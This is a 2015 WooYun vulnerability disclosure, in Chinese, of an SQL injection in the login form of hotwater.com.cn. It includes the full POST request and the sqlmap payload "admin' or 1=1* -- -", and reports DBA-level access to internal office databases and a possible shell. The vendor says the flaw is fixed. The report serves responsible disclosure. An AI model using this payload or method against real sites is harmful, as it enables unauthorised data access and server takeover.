当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152628

漏洞标题:艾欧史密斯主站存在SQL注入(跨32库+root可shell)

相关厂商:hotwater.com.cn

漏洞作者: 路人甲

提交时间:2015-11-07 18:40

修复时间:2015-12-25 08:16

公开时间:2015-12-25 08:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

貌似是整个内部办公系统~~

详细说明:

目标:www.hotwater.com.cn
查了下备案,发现居然是主站之一

host.jpg


检测发现以下地方存在SQL注入:(POST中的TextBoxeAddress,布尔盲注/Stacked Queries)

POST http://www.hotwater.com.cn/project_index.aspx HTTP/1.1
Host: www.hotwater.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=zieaon55ulj3lm45vtphoh45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
__VIEWSTATE=dDwxODQwNTkzOTM5O3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDc%2BOz47bDx0PHA8cDxsPFRleHQ7PjtsPOeUqOaIt%2BS4jeWtmOWcqO%2B8jOivt%2BehruiupOaYr%2BWQpueUs%2Bivt%2BW8gOmAmui%2Fh0hPVFdBVEVS57O757uf5p2D6ZmQ77yBOz4%2BOz47Oz47Pj47Pj47bDxPa0J1dHRvbjs%2BPuNrX8cINg%2BfrrNtoWT27LrUKr8O&TextBoxeAddress=admin&OkButton.x=61&OkButton.y=34&UserPasswordTextBox=aaaa


SQLMap验证时,Payload如下

TextBoxeAddress=admin' or 1=1* -- -

漏洞证明:

1、漏洞证明:

sqlmap.jpg


sqlmap2.jpg


2、列出当前数据库用户,发现是sa(dba)

user.jpg


3、列出所有库,发现有oa、IM、Officer等内部办公库,显然是整个内部办公系统~~

dbs.jpg


4、不妨看下oa库,共202个表;再看下project库,共154个表。保护企业内部安全,具体数据就不跑了~

tb2.jpg


tb1.jpg


5、由于数据库用户是sa,看看shell

shell.jpg

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-10 08:16

厂商回复:

已修复,谢谢

最新状态:

暂无